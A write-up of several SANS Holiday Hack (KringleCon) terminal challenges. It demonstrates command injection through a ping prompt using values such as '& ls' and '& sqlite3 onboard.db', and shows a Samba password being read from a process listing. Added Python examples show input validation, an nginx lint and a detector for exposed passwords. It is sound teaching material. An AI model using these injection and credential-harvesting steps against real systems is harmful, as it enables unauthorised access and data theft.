Terminals
Essential Editor Skills
How to find the terminal
The terminal is located just to the right once you enter the castle. Look for Bushy Evergreen.
Hints:
Bushy Evergreen provides the hint Vi Editor Basics
Goal
Simply exit the VI editor program.
Approach
This may be a trivial task for those with experience in VI, but in reality I guarantee that everyone who has used VI has had to look up these basic commands at some point. Review the provided hint and you will find the solution.
Solution
Simply type the following into the terminal:
:wq
This will save and close the VI program.
Alternatives
You could also force a close without saving...
:q!
Or simply exit...
:q
Name Game
Terminal Prompt
```text
We just hired this new worker,
Californian or New Yorker?
Think he's making some new toy bag...
My job is to make his name tag.

Golly gee, I'm glad that you came,
I recall naught but his last name!
Use our system or your own plan,
Find the first name of our guy "Chan!"

-Bushy Evergreen

To solve this challenge, determine the new worker's first name and submit to runtoanswer.

====================================================================
=                                                                  =
= S A N T A ' S  C A S T L E  E M P L O Y E E  O N B O A R D I N G =
=                                                                  =
====================================================================

 Press  1 to start the onboard process.
 Press  2 to verify the system.
 Press  q to quit.

Please make a selection:
```
Background Information
We know we are looking for an opportunity to invoke a program from an input where calling it was never intended.
Hints:
Goal
Determine the first name of the new employee.
Approach
Test the approach described in the hint: enter `& ls` to see if we can get a directory listing, even though the input is expecting an IP address that it can ping. The shell will interpret our string after the "&" as a separate command and execute it.
```text
Validating data store for employee onboard information.
Enter address of server: & ls
Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
            [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
            [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
            [-w deadline] [-W timeout] [hop1 ...] destination
menu.ps1  onboard.db  runtoanswer
onboard.db: SQLite 3.x database
Press Enter to continue...:
```
We see that this indeed provided a directory listing and there are three files present.
- menu.ps1 (the PowerShell script that is providing the interactive prompts)
- onboard.db (May contain the data we are looking for)
- runtoanswer (Looks like this is a program we may have to submit our answer to)
Now let's try to access the database contents. Assuming it is a SQLite database, we can run the following:
```text
Validating data store for employee onboard information.
Enter address of server: & sqlite3 onboard.db
Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
            [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
            [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
            [-w deadline] [-W timeout] [hop1 ...] destination
SQLite version 3.11.0 2016-02-15 17:29:24
Enter ".help" for usage hints.
sqlite> .tables
onboard
sqlite> select * from onboard;
10|Karen|Duck|52 Annfield Rd||BEAL|DN14 7AU|077 8656 6609|karensduck@einrot.com
11|Josephine|Harrell|3 Victoria Road||LITTLE ASTON|B74 8XD|079 5532 7917|josephinedharrell@einrot.com
12|Jason|Madsen|4931 Cliffside Drive||Worcester|12197|607-397-0037|jasonlmadsen@einrot.com
13|Nichole|Murphy|53 St. John Street||Craik|S4P 3Y2|306-734-9091|nicholenmurphy@teleworm.us
14|Mary|Lyons|569 York Mills Rd||Toronto|M3B 1Y2|416-274-6639|maryjlyons@superrito.com
15|Luz|West|1307 Poe Lane||Paola|66071|913-557-2372|luzcwest@rhyta.com
16|Walter|Savell|4782 Neville Street||Seymour|47274|812-580-5138|walterdsavell@fleckens.hu
sqlite> PRAGMA table_info(onboard);
0|id|INTEGER|0||1
1|fname|TEXT|1||0
2|lname|TEXT|1||0
3|street1|TEXT|0||0
4|street2|TEXT|0||0
5|city|TEXT|0||0
6|postalcode|TEXT|0||0
7|phone|TEXT|0||0
8|email|TEXT|0||0
sqlite> select * from onboard where lname is 'Chan';
84|Scott|Chan|48 Colorado Way||Los Angeles|90067|4017533509|scottmchan90067@gmail.com
```
The next step is to submit the answer. Let's try the same technique we used with sqlite3 and run "runtoanswer":
```text
Validating data store for employee onboard information.
Enter address of server: & ./runtoanswer
Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
            [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
            [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
            [-w deadline] [-W timeout] [hop1 ...] destination
Loading, please wait......

Enter Mr. Chan's first name: Scott

[ASCII art banner: "MY NAME IS" name tag]

Congratulations!

onboard.db: SQLite 3.x database
Press Enter to continue...:
```
Solution
Using the above command we find that the first name of "Chan" is "Scott". Submitting this to "runtoanswer" confirmed our discovery.
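The flaw behind this terminal is worth seeing in code. The following is an added example written for this writeup, not the challenge's own menu.ps1: it reproduces in Python the pattern of a script that hands the "address of server" entry to a shell-built ping command, next to a hardened version that validates the entry as an IP literal and spawns ping from an argv list with no shell in between. The function names are my own.

```python
# Added example (not part of the original writeup, and not the challenge's
# own menu.ps1): the flaw behind the Name Game terminal, reproduced in Python.
# The onboarding menu hands the "address of server" to a shell-built ping
# command, so an entry such as "& ls" becomes a second command. The hardened
# version validates the entry as an IP literal and spawns ping with an argv
# list, never through a shell.
import ipaddress
import subprocess
from typing import List


def vulnerable_ping_command(user_input: str) -> str:
    """Return the string a naive script would hand to `sh -c`.

    Shown only to make the problem visible: everything after '&' (or ';', '|',
    backticks, ...) is parsed by the shell as its own command, which is how
    '& ls' and '& sqlite3 onboard.db' worked in the writeup above.
    """
    return f"ping -c 1 {user_input}"


def safe_ping_argv(user_input: str) -> List[str]:
    """Validate the entry and build an argv list for subprocess (no shell).

    ipaddress.ip_address() accepts only IPv4/IPv6 literals, so shell
    metacharacters, whitespace and option-looking strings are rejected with
    ValueError before any process is started.
    """
    addr = ipaddress.ip_address(user_input.strip())
    return ["ping", "-c", "1", str(addr)]


def run_ping(user_input: str) -> int:
    """Run the validated ping; returns its exit status.

    shell=False (the default) means the list is passed to execve() as-is,
    so even a validation bypass could not turn the argument into a command.
    """
    return subprocess.run(safe_ping_argv(user_input), check=False).returncode


if __name__ == "__main__":
    for candidate in ["127.0.0.1", "& ls", "127.0.0.1 & ls"]:
        try:
            print(f"{candidate!r:20} -> {safe_ping_argv(candidate)}")
        except ValueError as exc:
            print(f"{candidate!r:20} -> rejected ({exc})")
```

The validation is an allow-list (only an address literal is accepted) rather than a deny-list of metacharacters, and the argv form means the remaining argument can never be re-parsed as a command even if validation were loosened later to accept hostnames.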
Curling Master
Terminal Prompt
```text
[ASCII art banner]

I am Holly Evergreen, and now you won't believe:
Once again the striper stopped; I think I might just leave!
Bushy set it up to start upon a website call.
Darned if I can CURL it on - my Linux skills apall.

Could you be our CURLing master - fixing up this mess?
If you are, there's one concern you surely must address.
Something's off about the conf that Bushy put in place.
Can you overcome this snag and save us all some face?
```
Complete this challenge by submitting the right HTTP request to the server at http://localhost:8080/ to get the candy striper started again. You may view the contents of the nginx.conf file in /etc/nginx/, if helpful.

```text
elf@4603a459f5f2:~$
```
Approach
Checking the nginx.conf file, we see the server is listening with the new http2 protocol:
```text
cat /etc/nginx/nginx.conf
...
    server {
        # love using the new stuff! -Bushy
        listen 8080 http2;
        # server_name localhost 127.0.0.1;
        root /var/www/html;

        location ~ [^/]\.php(/|$) {
...
```
Knowing the server expects the http2 protocol and is likely serving an index.php file, let's see what we get when we send a simple GET request:
```text
elf@e854cc838c86:/etc/nginx$ curl --http2-prior-knowledge http://localhost:8080/index.php
<html>
 <head>
  <title>Candy Striper Turner-On'er</title>
 </head>
 <body>
  <p>To turn the machine on, simply POST to this URL with parameter "status=on"
 </body>
</html>
```
That worked! Now let's send the requested data to the site with a POST command:
```text
elf@e854cc838c86:/etc/nginx$ curl -X POST --http2-prior-knowledge http://localhost:8080/index.php -d 'status=on'
<html>
 <head>
  <title>Candy Striper Turner-On'er</title>
 </head>
 <body>
  <p>To turn the machine on, simply POST to this URL with parameter "status=on"

[ASCII art banner]

Unencrypted 2.0? He's such a silly guy.
That's the kind of stunt that makes my OWASP friends all cry.
Truth be told: most major sites are speaking 2.0;
TLS connections are in place when they do so.

-Holly Evergreen

<p>Congratulations! You've won and have successfully completed this challenge.
<p>POSTing data in HTTP/2.0.
 </body>
</html>
```
Solution
Send the following POST request using the new http2 protocol via Curl:
```bash
curl -X POST --http2-prior-knowledge http://localhost:8080/index.php -d 'status=on'
```
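Holly's closing verse is the defender's point of this terminal: HTTP/2 belongs on a TLS listener, and `listen 8080 http2;` without `ssl` serves it in the clear (which is exactly why `--http2-prior-knowledge` was needed). The following is an added example, not code from the writeup or from nginx: a small lint that scans `listen` directives and flags any that enable http2 without ssl. The config text is constructed for the example; its first server block mirrors Bushy's directive above, the second shows the corrected form, and the certificate paths are placeholders. It only checks the `listen ... http2` syntax used on this page.

```python
# Added example (not the writeup's own code): a lint for the issue Holly
# calls out at the end of the Curling Master terminal, HTTP/2 served without
# TLS. It scans nginx "listen" directives and flags any that carry the http2
# parameter but not ssl. The config below is constructed for the example;
# its first server block mirrors Bushy's directive from the writeup.
import re
from typing import List, Tuple

# A listen directive: "listen <args>;" with args up to the ';' (comments excluded)
LISTEN_RE = re.compile(r"^\s*listen\s+([^;#]+);")


def cleartext_http2_listeners(config_text: str) -> List[Tuple[int, str]]:
    """Return (line number, listen arguments) for every listen directive
    that enables http2 without ssl. Commented-out lines are ignored."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        if line.strip().startswith("#"):
            continue
        m = LISTEN_RE.match(line)
        if not m:
            continue
        params = m.group(1).split()
        if "http2" in params and "ssl" not in params:
            findings.append((lineno, " ".join(params)))
    return findings


# Constructed sample config: weak listener first, hardened listener second.
SAMPLE_NGINX_CONF = """\
http {
    server {
        # love using the new stuff! -Bushy
        listen 8080 http2;
        root /var/www/html;
    }
    server {
        # corrected form: HTTP/2 is negotiated over TLS (ALPN), never in the clear
        listen 443 ssl http2;
        ssl_certificate     /etc/nginx/certs/fullchain.pem;   # placeholder path
        ssl_certificate_key /etc/nginx/certs/privkey.pem;     # placeholder path
        root /var/www/html;
    }
    server {
        listen 80;   # plain HTTP/1.1 redirect, not flagged by this check
        return 301 https://$host$request_uri;
    }
}
"""

if __name__ == "__main__":
    for lineno, args in cleartext_http2_listeners(SAMPLE_NGINX_CONF):
        print(f"line {lineno}: 'listen {args};' enables http2 without ssl")
```

Run against the real file with `cleartext_http2_listeners(open("/etc/nginx/nginx.conf").read())`; with the corrected listener in place the function returns an empty list, and the `curl` call above would then need `https://` rather than prior-knowledge h2c.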
Stall Mucking Report
https://docker.kringlecon.com/?challenge=plaintext-creds
Terminal Prompt
```text
[ASCII art banner]

Thank you Madam or Sir for the help that you bring!
I was wondering how I might rescue my day.
Finished mucking out stalls of those pulling the sleigh,
My report is now due or my KRINGLE's in a sling!

There's a samba share here on this terminal screen.
What I normally do is to upload the file,
With our network credentials (we've shared for a while).
When I try to remember, my memory's clean!

Be it last night's nog bender or just lack of rest,
For the life of me I can't send in my report.
Could there be buried hints or some way to contort,
Gaining access - oh please now do give it your best!

-Wunorse Openslae

Complete this challenge by uploading the elf's report.txt file to the samba share at //localhost/report-upload/

elf@394f4ff50540:~$
```
Approach
Let's see where the report.txt file is located so we can determine our next steps.
```text
elf@394f4ff50540:~$ ls
report.txt
```
Found it. Now we need to upload it to the server, but we don't have the password for the share. Based on the hints provided, we will likely be able to find the password previously used by looking at recent commands run on the machine. If a password is entered on the command line, it will often show up in a process listing. Let us check:
```text
elf@394f4ff50540:~$ ps -auxf | more
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0  17952  2780 pts/0    Ss   15:14   0:00 /bin/bash /sbin/init
root        10  0.0  0.0  45320  3176 pts/0    S    15:14   0:00 sudo -u manager /home/manager/samba-wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not-run-as-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special --suppress --suppress //localhost/report-upload/ ***directreindeerflatterystable*** -U report-upload
manager     17  0.0  0.0   9500  2592 pts/0    S    15:14   0:00  \_ /bin/bash /home/manager/samba-wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not-run-as-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special --suppress --suppress //localhost/report-upload/ directreindeerflatterystable -U report-upload
manager     36  0.0  0.0   4196   660 pts/0    S    15:17   0:00      \_ sleep 60
root        11  0.0  0.0  45320  3212 pts/0    S    15:14   0:00 sudo -E -u manager /usr/bin/python /home/manager/report-check.py
manager     16  0.0  0.0  33848  8132 pts/0    S    15:14   0:00  \_ /usr/bin/python /home/manager/report-check.py
root        15  0.0  0.0  45320  3068 pts/0    S    15:14   0:00 sudo -u elf /bin/bash
elf         18  0.0  0.0  18208  3304 pts/0    S    15:14   0:00  \_ /bin/bash
elf         37  0.0  0.0  36636  2960 pts/0    R+   15:18   0:00      \_ ps -auxf
elf         38  0.0  0.0   6420   920 pts/0    S+   15:18   0:00      \_ more
root        23  0.0  0.0 316680 15384 ?        Ss   15:14   0:00 /usr/sbin/smbd
root        24  0.0  0.0 308372  5824 ?        S    15:14   0:00  \_ /usr/sbin/smbd
root        25  0.0  0.0 308388  5568 ?        S    15:14   0:00  \_ /usr/sbin/smbd
root        27  0.0  0.0 316664  5928 ?        S    15:14   0:00  \_ /usr/sbin/smbd
```
Sure enough, it looks like the password was entered directly on the command line and was "directreindeerflatterystable".
Now we can use smbclient to connect to the share and try to upload the file.
```text
elf@394f4ff50540:~$ smbclient --help
Usage: smbclient service <password>

elf@394f4ff50540:~$ smbclient //localhoast/report-upload/ directreindeerflatterystable
WARNING: The "syslog" option is deprecated
Connection to localhoast failed (Error NT_STATUS_UNSUCCESSFUL)
```
Well, that didn't work (note that the host was also mistyped as "localhoast" in that attempt). Maybe it is expecting a different user account.
Looking back at the ps output, we see the portion `-U report-upload`. This must be the user account, so let's try with that.
```text
elf@394f4ff50540:~$ smbclient //localhost/report-upload/ -U report-upload directreindeerflatterystable
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.12-Debian]
smb: \>
```
We are in! What commands can we run?
```text
smb: \> ?
?              allinfo        altname        archive        backup
blocksize      cancel         case_sensitive cd             chmod
chown          close          del            dir            du
echo           exit           get            getfacl        geteas
hardlink       help           history        iosize         lcd
link           lock           lowercase      ls             l
mask           md             mget           mkdir          more
mput           newer          notify         open           posix
posix_encrypt  posix_open     posix_mkdir    posix_rmdir    posix_unlink
posix_whoami   print          prompt         put            pwd
q              queue          quit           readlink       rd
recurse        reget          rename         reput          rm
rmdir          showacls       setea          setmode        scopy
stat           symlink        tar            tarmode        timeout
translate      unlock         volume         vuid           wdel
logon          listconnect    showconnect    tcon           tdis
tid            logoff         ..             !
```
"put" seems to be the command to send the file to the share.
```text
smb: \> put report.txt
putting file report.txt as \report.txt (250.5 kb/s) (average 250.5 kb/s)
smb: \> Terminated
elf@394f4ff50540:~$

[ASCII art banner: "Stall Mucking" report]

You have found the credentials I just had forgot,
And in doing so you've saved me trouble untold.
Going forward we'll leave behind policies old,
Building separate accounts for each elf in the lot.

-Wunorse Openslae
```
Looks like that did it! We successfully obtained the credentials by looking at previously issued commands via the `ps` command and used them to connect to the protected Samba share.
Note
In this exercise we used the command `smbclient //localhost/report-upload/ -U report-upload directreindeerflatterystable`, which exposes the password in the process listing to anyone who can run `ps`, exactly the weakness we just exploited. Instead, we should have left the password off the command line and waited for smbclient to prompt for it:
```bash hl_lines="3"
elf@394f4ff50540:~$ smbclient //localhost/report-upload/ -U report-upload
WARNING: The "syslog" option is deprecated
Enter report-upload's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.12-Debian]
smb: \>
```
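The same observation can be turned into a check that a defender runs rather than an attacker. The following is an added example, not part of the writeup: a small detector that parses `ps auxf`-style rows and flags smbclient-style invocations carrying a password, in the two forms this terminal shows, a share path (`//host/share`) followed by a positional password (the `smbclient service <password>` form from the help text above) and `-U user%password`. The sample rows are constructed for the example; row 17 mirrors the writeup's samba-wrapper.sh process with its argument list abridged, and the `backup%Winter2018` row is invented.

```python
# Added example (not part of the original writeup): a detector for the
# failure shown in the Stall Mucking terminal, a password passed as a
# command-line argument, where every local user can read it from `ps`.
# It parses `ps auxf`-style rows and flags smbclient-style invocations in
# two forms: a share path (//host/share) followed by a positional password,
# and "-U user%password". Sample rows are constructed for this example.
import re
from typing import Dict, List

# ps aux columns: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
PS_ROW_RE = re.compile(r"^(\S+)\s+(\d+)(?:\s+\S+){8}\s+(.*)$")
# A UNC-style share path token such as //localhost/report-upload/
SHARE_RE = re.compile(r"^//[^/\s]+/\S+$")


def find_exposed_passwords(ps_lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per command line that carries a password."""
    findings = []
    for line in ps_lines:
        m = PS_ROW_RE.match(line)
        if not m:
            continue  # header, or a line that is not a process row
        user, pid, command = m.groups()
        tokens = [t for t in command.split() if t != "\\_"]  # drop `ps -f` tree marks
        for i, tok in enumerate(tokens[:-1]):
            nxt = tokens[i + 1]
            if SHARE_RE.match(tok) and not nxt.startswith("-"):
                # smbclient //host/share <password>: the non-option token that
                # follows the share path is the password.
                findings.append({"pid": pid, "user": user,
                                 "form": "positional after share", "secret": nxt})
            elif tok == "-U" and "%" in nxt:
                # smbclient -U user%password packs the password into the -U value.
                findings.append({"pid": pid, "user": user,
                                 "form": "-U user%password", "secret": nxt.split("%", 1)[1]})
    return findings


# Constructed sample; row 17 mirrors the writeup's samba-wrapper.sh process
# (arguments abridged), row 40 is the safe prompt-for-password form.
SAMPLE_PS_LINES = [
    "USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND",
    r"manager     17  0.0  0.0   9500  2592 pts/0    S    15:14   0:00  \_ /bin/bash /home/manager/samba-wrapper.sh --suppress //localhost/report-upload/ directreindeerflatterystable -U report-upload",
    r"elf         40  0.0  0.0  36636  2960 pts/0    S+   15:20   0:00      \_ smbclient //localhost/report-upload/ -U report-upload",
    r"manager     41  0.0  0.0  36636  2960 pts/0    S    15:21   0:00 smbclient //fileserver/backup -U backup%Winter2018",
    r"root        23  0.0  0.0 316680 15384 ?        Ss   15:14   0:00 /usr/sbin/smbd",
]

if __name__ == "__main__":
    for f in find_exposed_passwords(SAMPLE_PS_LINES):
        print(f"pid {f['pid']} ({f['user']}): {f['form']} -> {f['secret']}")
```

Feed it live output with `find_exposed_passwords(subprocess.check_output(["ps", "auxf"], text=True).splitlines())`. Row 40 produces no finding because the password is supplied at the prompt, which is the fix the Note above describes; smbclient's `-A` authentication-file option (mode 0600) is the equivalent for unattended scripts such as samba-wrapper.sh.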
The Sleighbell
https://docker.kringlecon.com/?challenge=unlinked-function
Dev Ops Fail
https://docker.kringlecon.com/?challenge=gitpasshist
Python escape from
https://docker.kringlecon.com/?challenge=python_docker_challenge
Lethal ForensicELFication
https://docker.kringlecon.com/?challenge=viminfo
Yule Log Analysis
https://docker.kringlecon.com/?challenge=spray-detect